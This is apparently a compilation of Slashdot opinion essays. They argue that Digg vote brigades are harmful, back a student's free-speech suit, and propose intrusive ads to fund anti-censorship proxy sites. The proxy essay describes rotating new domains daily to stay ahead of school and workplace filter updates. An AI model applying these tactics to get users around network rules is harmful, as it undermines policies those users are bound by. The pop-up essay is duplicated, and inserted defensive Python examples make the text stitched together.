Even if you just arrived from Mars and have never heard of Digg, that description of the service should make it obvious how easy it is to game the system, by rounding up groups of friends to vote on stories that you want to promote, or to bury stories that you want to kill. The former type of abuse (and it is abuse, under Digg's Terms of Use; search for "organized effort") is far more common, since people usually have more incentive (commercial or otherwise) to promote their own work than to bury someone else's. And in fact, Digg has announced that the next version of the service will remove the "bury" button, replacing it with a "Report" button for reporting bona fide cases of abuse, not just to bury boring stories.
The thinking seems to be that abusive "digging" to promote a story, is less harmful than abusive "burying", and this has the ring of plausibility — that a creative effort is better than a destructive one. After all, Alternet had previously highlighted several artificial right-wing "digg brigades" mentioned in their story (Diggs And Buries, theliberalheretic, etc.), but they didn't blow the lid off of the situation until their report on the Digg Patriots bury brigade, as if to say, "Now we've found something really scandalous!" Annalee Newitz cheekily reported on how she bought votes to boost a story to the front page of Digg, but probably would have felt guilty if she'd hired a service to bury someone else's story. And when a Digg user organized an effort to bury Ron Paul stories that he thought were "spamming" the system, Ron Paul supporters protested that they were merely organizing to vote up stories they agreed with — the clear implication being that this was more honorable than organizing to vote stories down.
But this, I think, is a fallacy. If a story's ranking is artificially inflated, then the extra eyeballs for that story have to come from somewhere, and they come from users paying less attention to the other stories that the phony up-and-comer pushed out of the way. Artificially bumping a story up is just as harmful as artificially burying a story, but the harm is distributed among many innocent victims, not just one. (By the same reasoning, in fact, you could argue that burying a story does no net harm to other users of the Digg site, because the harm done to one story is cancelled out by the benefit to all the other stories that rise in prominence when the victimized story is pushed out of the way. So by strict economic logic, recruiting friends to boost your own story at the expense of everyone else's, is actually more harmful than organizing a bury brigade!)
So I don't think that Digg's replacing the "bury" button with a "report" button will fix the problem. For one thing, obviously groups could abuse the "report" button in the same way — issuing calls to action to report a story for violating the TOU. Since a flurry of bona fide abuse reports is presumably what Digg uses to identify and remove truly abusive stories like MLM spam, how are they going to tell the difference between these cases and cases of abusive "reporting"? (My suggestion: See if there is a sudden change in the percentage of users who view a story and make an abuse report. For stories that are genuine TOU violations, the percentage of users who "report" it should remain steady; for stories that are victimized by a "report brigade," you'll see a sudden spike in viewers and in the percentage of those viewers who report the story for abuse. This might have worked for detecting and stopping the bury brigades as well, although we'll never know now.)
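The report-rate check suggested in the parenthetical above can be written as a small detector. This is an added example, not code from the essay or from Digg; the hourly `(views, reports)` counts are constructed, and the function name and thresholds are assumptions chosen for illustration.

```python
"""Flag hours where a story's abuse-report rate jumps together with its traffic."""

# Constructed sample data: (views, reports) per hour, oldest first.
# A genuine TOU violation: traffic grows, but about 10% of viewers report it throughout.
SPAM_STORY = [(400, 40), (420, 44), (1500, 150), (1600, 165)]
# A story hit by a "report brigade": views and the report rate spike in the same hours.
BRIGADED_STORY = [(500, 2), (520, 3), (480, 2), (2400, 310), (2100, 290), (510, 3)]


def find_report_spikes(hours, view_factor=3.0, rate_factor=3.0,
                       min_baseline_views=200, min_reports=10):
    """Return (hour_index, report_rate, baseline_rate) for each suspicious hour.

    An hour is suspicious when BOTH its views and its report rate are at least
    `view_factor` / `rate_factor` times the baseline built from earlier,
    unflagged hours. All thresholds are assumed values, not Digg's.
    """
    flagged = []
    base_views = base_reports = base_hours = 0
    for i, (views, reports) in enumerate(hours):
        enough_history = base_views >= min_baseline_views
        if enough_history and views > 0 and reports >= min_reports:
            mean_views = base_views / base_hours
            # Treat a baseline with zero reports as one report, so the
            # comparison below never multiplies by a zero rate.
            base_rate = max(base_reports, 1) / base_views
            rate = reports / views
            if views >= view_factor * mean_views and rate >= rate_factor * base_rate:
                flagged.append((i, rate, base_rate))
                continue  # keep the suspicious hour out of the baseline
        base_views += views
        base_reports += reports
        base_hours += 1
    return flagged


if __name__ == "__main__":
    for name, hours in (("spam", SPAM_STORY), ("brigaded", BRIGADED_STORY)):
        spikes = find_report_spikes(hours)
        print(name, [(h, f"{r:.1%} vs {b:.1%}") for h, r, b in spikes])
```

The steady-rate story produces no flags even when its traffic nearly quadruples, while the brigaded story is flagged only in the two hours where both signals jump.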
But more fundamentally, even if this change does stop the "bury/report brigades" from killing stories at will, that only fixes the most obvious symptom of the underlying problem, which is that the system can be gamed by recruiting your friends to vote either way. It won't stop "brigades" from artificially promoting shallow stories that agree with their opinions, which does the same net harm overall.
Indeed, the most long-term harm that the DiggPatriots Yahoo Group might have done is that their cheating was so egregious that it makes other examples of cheating look benign by comparison, and might prevent people from realizing that "benign cheating" is just as harmful. As detailed in the Alternet report, the DiggPatriots group talked openly about cycling through different Digg accounts and circumventing bans on their IP addresses. The welcome message to the Yahoo Group told new users that the group was operating "under the radar." The group leader, a woman with the handle "bettverboten," talked about how to prevent Digg from monitoring their actions. And of course the vast majority of posts were calls to bury stories. But what if all of that had been inverted? If the group had operated in the open, while still focusing on recruiting conservative members? If each user limited themselves to only one Digg account like they were supposed to? And if they focused not on burying stories, but on digging stories that promoted their viewpoints? Just as bad. It just doesn't sound as bad.
I still think the only way to make Digg a true meritocracy, would be to use some version of an algorithm I outlined in an earlier article, inauspiciously titled "How to Stop Digg-cheating, Forever." The gist of it is that in addition to collecting votes from friends, stories should be shown to a random subset of users on the site (perhaps in a box that occasionally appears at the top of the screen when they're logged in), who are asked to vote it up or down. The votes of a random sampling of users would be more representative of how much value the story would have to the Digg community as a whole. Even if most users who are asked to vote on a "random story" simply ignore the request, all you need is to show the story to a large enough sample that you can measure the difference in responses to a truly good story vs. one that has been promoted by digg-cheaters. You don't necessarily have to run this procedure for every story, only the ones that are about to gain some benefit from a large number of diggs (such as being pushed to the front page), and you need to decide whether the story really deserves that big boost. The only way to game that system would be to organize a group of dedicated Digg users so enormous that they constituted a significant percentage of all users on the system — something pretty hard to do without getting caught.
Still, the only site that I know of, that uses a version of this "random sampling" algorithm is HotOrNot.com, which lets you recruit your friends to vote on the "hotness" of your picture on a scale of 1 to 10 (by sending them a link to that specific picture), but also shows a stream of random pictures to visitors, so that your picture can collect votes from strangers. If the votes from the users who visit your picture via the link are significantly different from the votes from users who see your picture via the random stream, then HotOrNot discounts the votes from users who view your page via the link. This prevents digg-style gaming from people who want all their friends to give them a 10. (Note that if you think about it, this is essentially the same as always throwing out the votes from people who visit your picture via the link. If you collect votes from group A and B, but you only count the votes from group A if they agree with the votes from group B, then you're really only counting votes from group B! All the extra votes really give you is the ability to brag that X many people voted on your picture.)
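The random-sampling idea from the two paragraphs above, as an added example (not code from the essay, Digg or HotOrNot): a story's fate is decided only by votes from randomly chosen users, and votes recruited by link are compared against that sample and marked as discounted when they differ significantly. The names `Tally` and `audit`, the 60% promotion bar, the minimum sample of 100 and the z cutoff of 2.58 are all assumptions.

```python
"""Decide promotion from a random sample; compare recruited votes against it."""
import math
from dataclasses import dataclass


@dataclass
class Tally:
    up: int      # up-votes received
    total: int   # votes actually cast; ignored prompts are simply not counted

    @property
    def rate(self):
        return self.up / self.total if self.total else 0.0


def wilson_lower(t, z=1.96):
    """Lower bound of the Wilson score interval for the true up-vote fraction."""
    if t.total == 0:
        return 0.0
    n, p = t.total, t.rate
    centre = p + z * z / (2 * n)
    margin = z * math.sqrt(p * (1 - p) / n + z * z / (4 * n * n))
    return (centre - margin) / (1 + z * z / n)


def z_score(a, b):
    """Two-proportion z statistic for the gap between the rates of a and b."""
    if a.total == 0 or b.total == 0:
        return 0.0
    pooled = (a.up + b.up) / (a.total + b.total)
    se = math.sqrt(pooled * (1 - pooled) * (1 / a.total + 1 / b.total))
    return (a.rate - b.rate) / se if se else 0.0


def audit(linked, sampled, promote_at=0.6, min_sample=100, z_crit=2.58):
    """linked: votes arriving via shared links; sampled: votes from random users.

    The decision uses the random sample alone, which matches the essay's point
    that counting link votes only when they agree with the sample is the same
    as not counting them. The z score is kept as a signal of organized voting
    in either direction (positive: digging, negative: burying).
    """
    if sampled.total < min_sample:
        return {"decision": "keep sampling", "link_votes": "undecided", "z": None}
    z = z_score(linked, sampled)
    link_votes = "discounted" if abs(z) > z_crit else "consistent"
    decision = "promote" if wilson_lower(sampled) >= promote_at else "hold"
    return {"decision": decision, "link_votes": link_votes, "z": z}


if __name__ == "__main__":
    # Constructed tallies for three stories.
    cases = {
        "dug by friends": (Tally(480, 500), Tally(70, 200)),
        "organic hit": (Tally(90, 120), Tally(150, 200)),
        "buried by brigade": (Tally(5, 300), Tally(150, 200)),
    }
    for name, (linked, sampled) in cases.items():
        print(name, audit(linked, sampled))
```

In the third constructed case the story is still promoted despite 295 recruited down-votes, because the random sample's lower confidence bound stays above the bar.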
This seems like the simplest way to prevent Digg-cheating, although there may be others. Still unresolved is how to solve the general problem of "gaming" in traditional media and the blogosphere. For the foreseeable future, it's going to be the simple truth that if a major media outlet wants to run a story, it will be heard, and if no media outlet wants to run it, it won't be heard, regardless of how many viewers or readers would have voted in some hypothetical poll that, yes, they want to read that story, and yes, they liked it afterward. That's true for Internet articles as well, except to the extent that a deserving article might be rescued from obscurity by Digg, but the more that system can be gamed, the less it will reward articles that really deserve it. Digg is gameable because power users can recruit votes from their friends; the media and the blogosphere are so obviously "gameable" that we don't even call it "gameable," because "power users" — media outlets and A-list bloggers — can run whatever they want. Right now, the only way I can think of to change this situation that is even logically possible, would be for a site like Digg to adopt some version of the random-sampling algorithm, and to continue growing in power until a significant percentage of the public (not just Internet users, but everybody) relied on it for information. Then, if you had something important to say, people would hear it, but you wouldn't be able to cheat your way to the top.
The ultimate irony is that Alternet's story may never have seen the light of day, if it hadn't been the beneficiary of the same gameable, non-meritocratic inefficiencies that exist in the media-blogo-outrage-o-sphere, just as they exist on Digg. Yes, the Alternet story deserved to be heard, but you don't get the publicity you deserve, you get the publicity that you organize, and Alternet had the organizational publicity structure in place to get their voice heard. If a kid blogging from his bedroom had infiltrated the Digg Patriots group and made essentially the same discovery, would anybody ever have heard about it? (Well, maybe, because of the political hot-button factor — but even then, only after the story had been picked up by a major site like Alternet.) A truly meritocratic Digg algorithm could make it possible to get a good story out without a lot of organizational support behind it — and to ensure that an organized effort can't kill a good story either.
-
Suspension of Disbelief
Frequent Slashdot Contributor Bennett Haselton writes in "A federal judge rules that a student can seek attorney's fees against a high school principal who suspended her for a Facebook page she made at home. Good news, but how could the school have thought they had the right to punish her for that in the first place? Posing the question not rhetorically but seriously. What is the source of society's attitudes toward the free-speech rights of 17-year-olds?"
Well, you knew this post was coming when you read the news. A federal judge has ruled that Katie Evans, who had been suspended from high school for creating a Facebook group calling one of her teachers "the worst teacher I've ever met," can proceed with her suit seeking attorney's fees from her principal for violating her First Amendment rights. Evans, now a journalism student at the University of Florida, is represented in her suit by the ACLU of Florida.
If any of the recent student online free-speech cases should have been adjudicated in the student's favor, this would most clearly be the one. As Judge Barry Garber wrote in his ruling, Evans's page did not contain threats of violence (if it had, it would have been a matter for the police, not for a school punishment), and the principal didn't even find out about the page until two months after she took it down. It's hard to believe that the principal's lawyers, if he consulted with them, would have gone along with a recommendation to suspend the student. And once the Florida ACLU contacted the principal, wouldn't he have realized that the longer he fought the case, the more legal bills the ACLU would amass, along with the possibility that the principal could be ordered to pay them? Even if he had estimated that there would only be a 5% chance that he could end up being ordered to pay legal fees, was it worth the risk, if the fees could come to thousands or tens of thousands of dollars? Well, now he knows.
When a different judge ruled that a student had no right to challenge his suspension for making a vulgar Myspace page about his principal, I said that there was no more objective basis for saying that the ruling was legally "right" than it was "wrong," because if you put 10 judges in separate rooms and ask them how they would rule on the case, you could get 10 different, mutually contradictory answers. Well, fair is fair — even though I support Judge Garber's ruling 100%, I have to concede that it did not necessarily follow inevitably from the facts and the law, and there's no objective basis for calling it "the" right ruling. Judges are not like doctors who look at a mammogram, and draw on experience that the general public does not have, in order to see something that would be hidden from the rest of us. In cases like these, judges simply have multiple plausible interpretations in front of them, and they pick one. As such they're acting more like referees (who make a decision so that the game — or, in this case, society — can move on) than true "experts."
There is a temptation to think that there is some consistent reasoning behind the different courts' rulings — say, that the student who created a vulgar page mocking his principal (the student was identified in papers only as "J.S.") went too far and crossed a line, while Katie Evans's page complaining about her teacher was clean enough to stay on the safe side of the line, and make her eligible for damages in a First Amendment suit. This, I think, is nonsense, an attempt to put a consistent theory on top of a legal system that does not follow consistent rules from one court ruling to the next. If different judges had been randomly assigned to J.S.'s case and Evans's case, then it might have been J.S. who won and Evans who lost. After all, it was a federal judge who once ruled that a Utah high school had the right to suspend a student for wearing sweatshirts emblazoned with "Vegan" and "Vegans Have First Amendment Rights." (The judge and the principal had apparently confused veganism with eco-terrorism.) How do you reconcile that with any of the recent rulings? (No prizes for guessing how that judge would have ruled if the shirts had said "Christian.")
But even if it's still a roll of the dice how a court would rule in a particular student free-speech case, what matters from the point of view of a principal in a future case, are the potential payoffs. What if you're thinking about suspending a student for a non-threatening, non-libelous Facebook page? If the case ends up in court and you win, then you get the satisfaction of being "vindicated." But if you lose, you could be ordered to pay tens of thousands of dollars to the student's attorneys. So even a small number of victories for students in free-speech cases, even if mixed in with an equal or greater number of victories for the schools, still create an enormous incentive for a principal not to risk the case at all, when the potential gain is so small and the potential loss so huge. Even if you think there's only a 5% chance of being ordered to pay the student's $10,000 legal bill, that means you'd still have to decide if it's worth (on average) about $500 to get the satisfaction of suspending them.
(On the other hand, if a student created a page that was so threatening or libelous towards a staff member, that the school would run the risk of being sued if the principal didn't suspend the student, then the school and the principal are taking some legal risk either way, but the risk involved in suspending the student is much smaller. Fine — there's nothing wrong with suspending a student for threats of violence.)
So the ruling is a much more significant victory for student speech than many of the parties involved probably realize. Even though Judge Garber didn't actually award Evans her attorney's fees (yet?) — he only said that she could proceed to seek them against the principal — just the fact that it's coming dangerously close to that, means that principals in future cases now know what the risks are.
But why was all this necessary? How did the legal and societal climate of attitudes toward people under 18, lead to a principal thinking that he could punish a 17-year-old for comments that she made about a teacher, on her own time, to a third-party audience? If the students in the school had been comprised, not of minors, but of adults from some other minority group — African Americans, immigrant women, native Spanish speakers — there's no question that the principal never would have thought he could get away with suspending the student for criticizing a teacher.
Similarly, students at Harriton High School in Rosemont, Pennsylvania just discovered that school officials had given laptops to students to take home with remotely-activated webcams, that could be used to take photos in students' homes and transmit them back to school officials. Incredibly, this was discovered not by students or their parents examining the laptops, but because school officials used the feature to take a photo of a student in his bedroom, and then confronted him about "inappropriate" behavior, not considering that the students and their parents might consider it "inappropriate" that the school snuck spy cams into their bedrooms. (The school has issued a denial claiming, "At no time did any high school administrator have the ability or actually access the security-tracking software" — which doesn't seem to make sense, since the lawsuit was filed in the first place because the student was told by the assistant principal that the webcam had caught him engaging in "inappropriate behavior.") What was the school thinking? Probably, they were thinking, "These are minors, we can do what we want." If their student clientele had been comprised of adults, they never would have dreamed that they could confront a student about behavior in their room that they captured with a hidden camera. (Ironically, the school may end up in more trouble for spying on minors, as this editorial argues, since the school officials may now be guilty of recording and possessing child porn, depending on what the cameras "captured" in the students' rooms!)
So no matter how much ink is spilled analyzing the legal technicalities of suspending a 17-year-old student for off-campus speech, that's not what the case is really about. The case is really about attitudes. Change society's attitudes to think of 17-year-olds the way we currently think of 25-year-olds, and no judge is going to deny them their right to criticize their school on their own time, any more than a judge in today's society would deny that right to a 25-year-old.
And where does this attitude towards minors come from? I suspect that most people who believe that we have to draw the line somewhere around age 18, believe it for no better reason than because they were raised in a society where most other people believe it too. If you think that setting the cutoff age at 18 is just "common sense," then I would bet my house that if you had been raised in a society where the cutoff age was set at 13, that would seem like "just common sense" to you as well, and similarly if you had been raised in a society where the cutoff had been set at 22. This may seem like an unremarkable observation, but my belief in minors' rights has always been motivated by a more fundamental belief that you should not believe things merely because most people in your society believe them. If that sounds like a trite platitude, consider how few people in the US seem to question the rule that you can show a man's chest on television but not a woman's chest. In more liberal Denmark, supermarkets can stock tabloids at toddler-eye-level with photos of topless women on the cover, while in Saudi Arabia, adult women can't leave the house without covering their faces, and in all three societies, the majority thinks these regulations are just plain "common sense." Is the age of majority just another arbitrary illusion caused by the power of consensus?
When I said this on The David Lawrence Show, the host made the thoughtful observation that most countries all over the world set the age of majority for most purposes at 18. Close, I said, but it doesn't quite prove what it seems to prove, because those globally diverse societies did not reach that conclusion independently — they move in similar directions because of cross-cultural influences. (The voting age was set at 21 in many democracies before many of them lowered it to 18 in the 1970's within a few years of each other.) To get a better sense of whether there is any merit to the idea, we'd have to do something like the "putting the 10 judges in 10 separate rooms" test — put 10 different societies in mutual isolation from each other, let them develop and debate things on their own, and see if all or most of them reach the conclusion that 18 is a good cutoff age for adulthood.
The idea that actual children — under the age of, say, 11 — are qualitatively different from adults, has in fact been re-discovered by civilizations that developed independently at different points in history, all over the world. So there's probably something to it. The idea that teenagers are qualitatively different from adults, is something particular to recent history, and a wise person transported forward in time from the 1500's to the present day might scratch their heads and wonder why we think that 18-year-olds should be allowed to criticize their teachers but 17-year-olds cannot. I suspect the artificial extension of childhood grew out of the fact that because modern jobs are more complicated than they used to be, we need more years of schooling before we can go out and compete in the workforce. The fallacy there, though, is that just because we need more years of schooling, doesn't mean that the natural age of "human maturity" has gone up. So we end up with 17-year-olds having to go to court to establish their right to criticize their teachers on their own time.
Judge Garber wouldn't have been in a position to make this argument in his ruling even if he agreed with it. But even if his ruling was based on logic that has nothing to do with the underlying case for minors' rights, it was still a step in the right direction.
-
Power To the Pop-Ups
Slashdot frequent contributor Bennett Haselton writes a piece advocating for Pop-Ups and even more obtrusive advertising. But not for the reasons you might think. He says "Annoying pop-up ads have been a great friend to Internet freedom, by enabling the operation of proxy sites that would be too expensive to operate otherwise. With the rising costs of making new proxy sites to stay ahead of the 'censorware' companies, even more intrusive ads could be an even bigger friend to Internet freedom. Got any ideas for how those more intrusive ads could work?" Clicky clicky below to read his point.
Most news and information websites carry advertisements, but usually not more than one pop-up ad, if they have pop-ups at all. This is because the costs of running the sites are low enough that they can usually pay for their costs with revenue from regular ads. Surely the site owners would like the extra money that they could get from pop-ups, if their viewers had nowhere else to go. But if they tried to get away with too many pop-ups on a typical news site, visitors would just leave for their competitors' sites instead. Competition keeps the "prices" — in terms of the ads that you have to view in order to visit a website — low.
By contrast, most proxy sites [that's not a link to one of my sites, so quit yer whining] — sites that you can use to get around Internet blocking, by using a form to type in the URL of the site that you want to access so the proxy site will fetch its contents for you — are festooned with pop-up ads, sometimes on every page load. As I can easily attest, the bandwidth and hardware costs of running a proxy site are sufficiently high that there would be no way to pay for the sites with the revenue from normal banner ads and AdSense blurbs. It's no exaggeration to say that most proxy sites, which enable people to circumvent government filtering in countries like China and Iran (not to mention helping millions of students get on Facebook and YouTube from school), would not exist without the pop-up ads to prop them up. (This may not be true of a proxy site that your high school classmate set up for himself and some friends, but it's true of most proxies created to serve a wide audience.)
Unfortunately it's becoming more expensive to run an effective proxy service that enables users to get around most enterprise filtering programs. If it gets to the point where normal pop-up ads do not bring in enough revenue to pay for the service, we might need a new breed of even more intrusive (and better-paying) ads. More intrusive than the drop-down ads that play noisy videos. More intrusive than the Flash animations that crawl across the screen on top of the words you're trying to read. I'm going to argue that a company that figures out how to run the most intrusive ads of all, could be the new best friend of Internet freedom. But first a note about why the costs are increasing.
Two years ago, I thought the cost of maintaining a proxy site to help people get around Internet filtering, would steadily fall, as bandwidth and processing power got cheaper. But bandwidth and hosting costs didn't drop as much as I had hoped, and the cost of maintaining an effective anti-filtering service has actually gone up, due to some advances made by Internet censoring programs. In 2007, the then-current versions of filtering programs like Smartfilter, Websense, and the 8e6 R3000 would typically only download updates to their blacklists once in the middle of the night. This meant that I could mail out a new proxy site to my proxy mailing list just after midnight, and it would be accessible to the mailing list subscribers all of the following day. (You wouldn't be able to get to them if your local network administrator subscribed to the mailing list and added the new sites to the local blacklist as soon as they came out, but most network admins didn't bother.) As of 2010, though, the latest versions of most enterprise filters are configured to automatically update their lists every hour or two. So to stay ahead of the filters, I have to mail out several sites every morning to different portions of the mailing list, so that the filtering companies generally learn about them and block them at different points throughout the day. Just registering several .com domains every day is not cheap. (GoDaddy sells .info domains for less than a dollar apiece, but this proved to be an ineffective solution because too many censored networks simply block all .info sites.)
There are also the increasing costs of maintaining compatibility with complex sites like Facebook and YouTube. Accessing Facebook through a proxy is still a hit-or-miss proposition. (I steer my users toward accessing the mobile version of Facebook, http://m.facebook.com/ , through the proxy, because it's a stripped-down version built for compatibility with mobile devices, and this simpler version is less likely to break when accessed with a proxy script.) YouTube access depends mainly on whether the latest YouTube plugin for the Glype proxy script is compatible with the current YouTube interface, and likewise can be working one week and broken the next. It's not hard to run a proxy site that provides compatibility with the most popular sites that people want to access, but it takes real work -- you can't just upload the script and forget about it.
(Many users in censored countries also use tools like Tor and UltraSurf to bypass their country's filters, but some of my contacts in those countries say that those tools are often too slow for them, so they end up using proxy sites instead. Since UltraSurf and Tor are free services, funded by donations and staffed by volunteers, the demand for those services can easily swell until they slow down from the overload.)
So what happens if maintaining an effective anti-censorship service becomes too expensive to pay for using just pop-up ads? Well, you could charge money for using your proxy site, but that brings with it a whole host of other problems. You have to set recurring billing in order to be paid through PayPal or some similar service, and run the risk of your funds being frozen if someone files a crank complaint against you. If one user has a paid account, you have to worry about them sharing the account with their friends or posting the account credentials on a public message board. And there are many proxy operators (including me) who would like to think that the proxies do provide a valuable public service to the world, and wouldn't want to exclude people who can't afford the monthly access fee.
I propose that ads which are even more intrusive than pop-ups -- thus grabbing more of the user's attention and providing more value to the advertiser, thus enabling them to pay more to sites which run the ads -- would enable proxy site operators to fund more of the costs of their operation, and hence would be a Good Thing. The existence of such intrusive ads does not mean that they would suddenly be plastered all over every proxy site. If your user base can be served for a lower cost, then you don't have to "charge" as much (in terms of advertisement intrusiveness) to use your proxy service. Over 90% of the traffic to my proxy sites is to domains that have already been blocked a long time ago by Websense, Smartfilter, Lightspeed, and most of the rest of the censorware companies. Apparently there are a lot of users who are on censored networks and who need proxies, but whose network admins just haven't updated the blacklists in a very long time, or who haven't paid the subscription fee to keep downloading database updates. Since you don't need to register 10 new domain names every day to serve that audience, there would continue to be proxies for those users with less-intrusive ads on them. But the more-intrusive (and higher-paying) ads would also enable proxy webmasters to serve a "higher-end" audience, the ones who need several new sites every day, to stay ahead of the more frequently-updated filters.
I can think of several ways that more intrusive ads might work. My favorite would be a "quiz" model wherein a drop-down advertisement appears in front of the site you're trying to access, consisting of some promotional content, and a little form at the bottom. In order to make the drop-down ad disappear, you have to read the ad and fill in the answers to some one-word questions or multiple-choice questions about the content, to prove you actually read it.
Perhaps I'm biased in favor of this idea because I'm tired of ads that contain splashy graphics and expensively licensed music and never contain any actual information. The only television ad that I can recall viewing in the past year which prompted me to actually buy the advertiser's product, was the Pizza Hut ad announcing that you could get a large pizza with any number of toppings for $10. That's what I want in an ad. I give you $10. You give me a pizza. (And this extra plug for their $10 pizza promotion, can be considered a thank-you to them for running an ad that actually had something to say.) Most ads on TV are far less informative, serving mostly to give a glossy sheen to the advertiser's brand name. Yet these ads are paid for by corporations who do the market research and the focus grouping, so the ads must work. Many economists, including Tim Harford in The Undercover Economist and Steven Landsburg in The Armchair Economist, have explained why companies pay for ads that do nothing except look expensive: Because they prove to the viewer that the company intends to be around for a long time, in order to capitalize on the long-term exposure given to them by the ad. This has become so standard that making an ad which actually gives the user information seems tawdry by comparison. The most ghetto-sounding word in TV advertising is "infomercial".
But I think that some companies could benefit from greater exposure of actual information about their product, just as there are companies that pay for infomercials. And if a company like Linksys really wanted to run a splashy ad that contained no actual information, and then make me answer some questions at the bottom like:
Linksys is:
(a) the leading manufacturer of wireless adapter cards
(b) the leading manufacturer of wireless routers
(c) the leading manufacturer of wireless monitoring cameras
(d) all of the above!!!
then that's their prerogative. The quiz-advertisement model only says that advertisers can require users to answer a question before closing the ad; it would be up to the advertiser to decide what question works best. I suspect that the actual-information model would work better for quiz ads, but advertisers could try both and see what works.
There are already some websites that require you to "complete an offer" (i.e. become a customer of some third-party company, at least for a free trial period) in order to use their services, but most proxy sites have so far declined to carry advertisements like these. Evidently their users consider this too high of a price to pay to access a proxy site. Filling out an offer is not just time-consuming, but leaves the door open to future problems -- will they sell your name or your e-mail address? Will they make it hard to cancel your "free trial", and then start billing you? The problem seems to be that there is too large of a gap between the "fees" associated with the two options -- a normal advertisement doesn't bring enough money to the proxy operator, but a complete-an-offer advertisement is such a steep price that most users won't pay it. The "quiz ad" is like a "fee" that falls nicely in the middle -- a smaller time commitment, and your worries are over after you fill in the quiz and hit submit.
If the very thought of such an ad still seems too annoying for words, then I think that objection misses the point. If the revenue from "normal" ads (pop-ups, drop-downs, AdSense widgets) is enough to pay for the operation of a "high-end" proxy service (catering to the people who need several new proxies every day), then such proxy services with "normal" ads will continue to exist. Indeed, anyone who tried running the more annoying "quiz ads" would not be able to get off the ground, because users would flock to the competing proxy sites using normal ads instead. If "high-end" proxy services flourished that were using quiz ads, it would only be because you simply can't provide a high-end service for less money than the quiz ads are bringing in.
It's possible that some advertisers would be reluctant to display ads in a manner that users would consider an annoying obstacle, but I'm not sure that's really a problem. The most intrusive advertisements currently in use on mainstream websites are probably the "premercials" that display before some news videos on CNN.com and other news sites. Unlike drop-down ads which can be closed with the click of a button, the video pre-mercials can't be skipped. Since you're actually expecting the news video to come up immediately when you click the link to start playing the video, you would think that many users would grit their teeth in annoyance upon seeing the "pre-mercial", and transfer that irritation to the advertiser's brand name, but there are so many big-name companies buying those pre-mercials that they must believe it's having a positive effect. So intrusiveness itself doesn't seem to tarnish a brand.
But I don't propose to micro-manage suggestions for how the more intrusive ads would look, or how advertisers should tailor their ads to fit the format. I'm just saying that a new breed of more intrusive ads, even more annoying than pop-ups, might be just what we need to stay ahead of increasingly sophisticated Internet censors. It's still technically quite trivial to release a steady stream of new proxy sites that defeat most Internet filters, but it costs money to buy domains and maintain the service, and the money has to come from somewhere.
-
Power To the Pop-Ups
Slashdot frequent contributor Bennett Haselton writes a piece advocating for Pop-Ups and even more obtrusive advertising. But not for the reasons you might think. He says "Annoying pop-up ads have been a great friend to Internet freedom, by enabling the operation of proxy sites that would be too expensive to operate otherwise. With the rising costs of making new proxy sites to stay ahead of the 'censorware' companies, even more intrusive ads could be an even bigger friend to Internet freedom. Got any ideas for how those more intrusive ads could work?" Clicky clicky below to read his point.
Most news and information websites carry advertisements, but usually not more than one pop-up ad, if they have pop-ups at all. This is because the costs of running the sites are low enough that they can usually pay for their costs with revenue from regular ads. Surely the site owners would like the extra money that they could get from pop-ups, if their viewers had nowhere else to go. But if they tried to get away with too many pop-ups on a typical news site, visitors would just leave for their competitors' sites instead. Competition keeps the "prices" — in terms of the ads that you have to view in order to visit a website — low.
By contrast, most proxy sites [that's not a link to one of my sites, so quit yer whining] — sites that you can use to get around Internet blocking, by using a form to type in the URL of the site that you want to access so the proxy site will fetch its contents for you — are festooned with pop-up ads, sometimes on every page load. As I can easily attest, the bandwidth and hardware costs of running a proxy site are sufficiently high that there would be no way to pay for the sites with the revenue from normal banner ads and AdSense blurbs. It's no exaggeration to say that most proxy sites, which enable people to circumvent government filtering in countries like China and Iran (not to mention helping millions of students get on Facebook and YouTube from school), would not exist without the pop-up ads to prop them up. (This may not be true of a proxy site that your high school classmate set up for himself and some friends, but it's true of most proxies created to serve a wide audience.)
Unfortunately it's becoming more expensive to run an effective proxy service that enables users to get around most enterprise filtering programs. If it gets to the point where normal pop-up ads do not bring in enough revenue to pay for the service, we might need a new breed of even more intrusive (and better-paying) ads. More intrusive than the drop-down ads that play noisy videos. More intrusive than the Flash animations that crawl across the screen on top of the words you're trying to read. I'm going to argue that a company that figures out how to run the most intrusive ads of all, could be the new best friend of Internet freedom. But first a note about why the costs are increasing.
Two years ago, I thought the cost of maintaining a proxy site to help people get around Internet filtering, would steadily fall, as bandwidth and processing power got cheaper. But bandwidth and hosting costs didn't drop as much as I had hoped, and the cost of maintaining an effective anti-filtering service has actually gone up, due to some advances made by Internet censoring programs. In 2007, the then-current versions of filtering programs like Smartfilter, Websense, and the 8e6 R3000 would typically only download updates to their blacklists once in the middle of the night. This meant that I could mail out a new proxy site to my proxy mailing list just after midnight, and it would be accessible to the mailing list subscribers all of the following day. (You wouldn't be able to get to them if your local network administrator subscribed to the mailing list and added the new sites to the local blacklist as soon as they came out, but most network admins didn't bother.) As of 2010, though, the latest versions of most enterprise filters are configured to automatically update their lists every hour or two. So to stay ahead of the filters, I have to mail out several sites every morning to different portions of the mailing list, so that the filtering companies generally learn about them and block them at different points throughout the day. Just registering several .com domains every day is not cheap. (GoDaddy sells .info domains for less than a dollar apiece, but this proved to be an ineffective solution because too many censored networks simply block all .info sites.)
There are also the increasing costs of maintaining compatibility with complex sites like Facebook and YouTube. Accessing Facebook through a proxy is still a hit-or-miss proposition. (I steer my users toward accessing the mobile version of Facebook, http://m.facebook.com/ , through the proxy, because it's a stripped-down version built for compatibility with mobile devices, and this simpler version is less likely to break when accessed with a proxy script.) YouTube access depends mainly on whether the latest YouTube plugin for the Glype proxy script is compatible with the current YouTube interface, and likewise can be working one week and broken the next. It's not hard to run a proxy site that provides compatibility with the most popular sites that people want to access, but it takes real work -- you can't just upload the script and forget about it.
(Many users in censored countries also use tools like Tor and UltraSurf to bypass their country's filters, but some of my contacts in those countries say that those tools are often too slow for them, so they end up using proxy sites instead. Since UltraSurf and Tor are free services, funded by donations and staffed by volunteers, the demand for those services can easily swell until they slow down from the overload.)
So what happens if maintaining an effective anti-censorship service becomes too expensive to pay for using just pop-up ads? Well, you could charge money for using your proxy site, but that brings with it a whole host of other problems. You have to set recurring billing in order to be paid through PayPal or some similar service, and run the risk of your funds being frozen if someone files a crank complaint against you. If one user has a paid account, you have to worry about them sharing the account with their friends or posting the account credentials on a public message board. And there are many proxy operators (including me) who would like to think that the proxies do provide a valuable public service to the world, and wouldn't want to exclude people who can't afford the monthly access fee.
